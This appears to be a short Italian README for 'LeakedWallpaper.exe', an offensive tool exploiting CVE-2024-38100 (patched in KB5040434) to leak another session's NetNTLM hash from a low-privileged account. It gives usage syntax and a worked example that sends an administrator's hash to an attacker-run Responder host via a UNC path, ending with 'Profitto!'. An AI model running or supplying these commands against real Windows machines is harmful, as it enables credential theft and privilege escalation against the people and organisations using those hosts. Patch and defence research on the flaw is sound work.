
Divulgazione dell'hash NetNTLM di qualsiasi utente. Corretto in KB5040434
Questo è uno strumento di escalation dei privilegi (corretto con CVE-2024-38100 in KB5040434) che ci permette di divulgare l'hash NetNTLM di un utente da qualsiasi sessione sul computer, anche se stiamo operando da un utente con privilegi limitati.
.\LeakedWallpaper.exe <sessione> \\<IP KALI>\c$\1.jpg [-downgrade]
# Esempio
.\LeakedWallpaper.exe 1 \\172.16.0.5\c$\1.jpg -downgrade
Se bloccato, consulta demo.mkv
Immaginiamo di avere due sessioni sul host:
ID sessione corrente: 2
ID sessione target: 1

IP Responder: 172.16.0.5
IP Windows: 172.16.0.2

Otteniamo l'hash NetNTLM di administrator con lo strumento!
.\LeakedWallpaper 1 \\172.16.0.5\c$\1.jpg
Profitto!
